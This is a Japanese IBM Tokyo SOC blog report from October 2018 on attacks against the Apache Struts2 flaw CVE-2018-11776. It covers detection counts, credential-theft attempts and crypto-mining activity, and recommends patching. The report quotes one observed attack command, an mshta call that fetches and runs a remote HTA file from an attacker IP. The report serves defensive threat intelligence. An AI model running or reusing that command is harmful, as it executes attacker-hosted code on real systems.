Tokyo SOC Report

Apache Struts2の脆弱性(S2-057/CVE-2018-11776)を狙う攻撃の動向について

2018-10-05

カテゴリー Tokyo SOC Report | 検知状況

記事をシェアする:

2018年8月22日にApache Struts2の脆弱性(S2-057/CVE-2018-11776)が公開されました。[1]
本脆弱性は下記影響を受けるバージョンのApache Struts2を利用し、設定ファイル(struts.xml など)でnamespaceの値が指定されていないか、ワイルドカードが指定されている場合、あるいは、URLタグの記述においてvalueかactionの値が指定されていない場合に、影響を受けるものです。脆弱性を悪用する不正なHTTPリクエストが送られた場合、システム上で悪意あるコマンドが実行される可能性があります。

■影響を受けるバージョン:
Apache Struts 2.3.34 およびそれ以前のバージョン
Apache Struts 2.5.16 およびそれ以前のバージョン

脆弱性公開直後にStruts2のサンプルアプリケーションを対象とした攻撃検証コードが公開されています。また、本脆弱性を悪用する攻撃も少数ながら検知しています。

下図は、IBM SOCにおいて2018年8月22日から9月30日までに検知した、本脆弱性を狙ったと考えられる攻撃検の知数の推移です。

Apache Struts2の脆弱性(S2-057/CVE-2018-11776)を狙った攻撃の検知数推移

Apache Struts2の脆弱性(S2-057/CVE-2018-11776)を狙った攻撃の検知数推移
(Tokyo SOC調べ 2018年8月22日~2018年9月30日)

IBM SOC全体では8月31日より攻撃と考えられる通信の検知を確認しています。攻撃の内容は、サーバー上の認証情報を取得する試みで、9月2日まで同様の内容の検知が確認されました。
その後の数日間、攻撃は確認されませんでしたが、9月7日から9月8日にかけて、仮想通貨採掘を目的とした攻撃と考えられる通信を国内外で確認しています。

検知内容は以下のとおりです。

  • 送信元IPアドレス: 91.211.88.38 (ウクライナ)
  • 実行を試みているコマンド: “mshta http://107.181.160.197/win/chstr.hta”

上記「chstr.hta」ファイルは調査時点でファイルの存在を確認できなかったため、スクリプトの内容については不明ですが、mshtaコマンドを利用していることからWindows環境をターゲットにしているものと考えられます。また、F5 Networks社によると、この脆弱性を悪用したLinuxおよびWindows両環境をターゲットにした仮想通貨採掘を目的とする攻撃が確認されていることが報告されています。[2] F5 Networks社で報告されているWindows環境をターゲットとした攻撃で実行を試みているコマンドの内容と、IBM SOCで確認されたコマンドの内容は類似しており、仮想通貨採掘を目的とした攻撃の可能性が高いと判断しています。

9月11日以降しばらくは攻撃通信の検知は確認されていませんでしたが、9月28日、29日と脆弱性の有無を調査する行為を検知しています。

なお、「CVE-2018-11776」以外のApache Struts2の脆弱性に対する攻撃も依然として確認されている状況です。特に2017年3月に公開された「CVE-2017-5638」に対する攻撃はIBM SOCで継続して検知されており、パロアルトネットワークス社によると、2018年9月7日に確認された「Mirai」の新たな亜種がIoT機器の脆弱性に加えて、「CVE-2017-5638」の脆弱性も標的としていることが報告されています。[3]

今後もApache Struts2を対象とした調査行為や攻撃通信は継続すると考えられます。影響を受けるバージョンを利用している場合は、すみやかに修正済みバージョンへのアップデートを実施することを推奨いたします。

【参考情報】
[1] S2-057 Apache Struts 2 Documentation Apache Software Foundation
[2] Apache Struts 2 Vulnerability (CVE-2018-11776) Exploited in CroniX Crypto-Mining Campaign
[3] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall

 

【著者情報】

猪股 秀樹の写真

猪股 秀樹

2000年インターネットセキュリティシステムズ株式会社入社。セキュリティー診断やIDS/IPSの導入プロジェクト、セキュリティー・コンサルティングなどさまざまなプロジェクトを手がける。2007年買収に伴い日本IBMに移籍。2012年よりセキュリティー・オペレーション・センターのチーフ・セキュリティー・アナリスト。

前の記事

Androidを狙う金融マルウェアExobot、その脅威のメカニズム

次の記事

Drupalの脆弱性(CVE-2018-7600)を悪用したWebサイトへの広範囲な攻撃を観測
More Tokyo SOC Report stories

X-Force

2020-03-25

X-Force が新型コロナウイルスに便乗した不正ドメインを検知

X-Force は、メディア業界を標的とした新型コロナウイルスに便乗した新しいスクワッティング・キャンペーンを検知し、X-Force Exchange (XFE) で公開しました。このキャンペーンは、ユーザーにログイン認 […]

さらに読む

セキュリティー・インテリジェンス

2020-02-17

小売業のセキュリティー対策はセール時期を問わず常時必須

IBM Security X-Force(Incident Response and Intelligence Services)のデータによると、小売サービス業界は、全業界の中で4番目に多い攻撃対象となっており、201 […]

さらに読む

セキュリティー・インテリジェンス

2020-02-07

ワイパー型マルウェア ZeroCleareが中東のエネルギー産業を標的に

中東のエネルギー産業を標的にした破壊的マルウェア攻撃 世界的なセキュリティー研究開発機関であるIBM X-Forceは、これまで長い期間にわたり中東の産業、特にエネルギー産業における破壊的マルウェアの調査と追跡を行ってき […]

さらに読む